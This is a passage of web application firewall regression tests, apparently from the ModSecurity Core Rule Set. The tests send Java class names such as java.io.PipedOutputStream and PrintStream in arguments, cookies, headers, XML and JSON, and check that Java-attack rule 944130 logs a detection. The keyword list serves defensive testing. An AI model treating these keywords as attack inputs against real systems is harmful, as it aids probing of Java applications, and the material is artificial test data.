- - test_title: 944130-193 - desc: "XML element value includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - 
data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-194 - desc: "Nested XML element value includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-195 - desc: "Content-Type text/plain includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-196 - desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.OutputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-197 
- desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.OutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-198 - desc: "Argument test includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-199 - desc: "Argument name includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-200 - desc: "Cookie test includes keyword 
java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-201 - desc: "Cookie name includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedOutputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-202 - desc: "Request header test includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-203 - desc: "XML attribute value includes keyword 
java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-204 - desc: "XML element value includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-205 - desc: "Nested XML element value includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-206 - desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-207 - desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedOutputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-208 - desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.PipedOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-209 - desc: "Argument test includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-210 - desc: "Argument name includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PipedReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-211 - desc: "Cookie test includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-212 - desc: "Cookie name includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-213 - desc: "Request header test includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-214 - desc: "XML attribute value includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-215 - desc: "XML element value includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-216 - desc: "Nested XML element value includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-217 - desc: "Content-Type text/plain includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-218 - desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-219 - desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.PipedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-220 - desc: "Argument test includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-221 - desc: "Argument name includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PrintStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-222 - desc: "Cookie test includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PrintStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-223 - desc: "Cookie name includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PrintStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-224 - desc: "Request header test includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - test: java.io.PrintStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-225 - desc: "XML attribute value includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-226 - desc: "XML element value includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-227 - desc: "Nested XML element value includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id 
\"944130\"" - - - - test_title: 944130-228 - desc: "Content-Type text/plain includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-229 - desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PrintStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-230 - desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.PrintStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-231 - desc: "Argument test includes 
keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-232 - desc: "Argument name includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-233 - desc: "Cookie test includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PushbackInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-234 - desc: "Cookie name includes keyword java.io.PushbackInputStream" - 
stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PushbackInputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-235 - desc: "Request header test includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PushbackInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-236 - desc: "XML attribute value includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-237 - desc: "XML element value includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-238 - desc: "Nested XML element value includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" 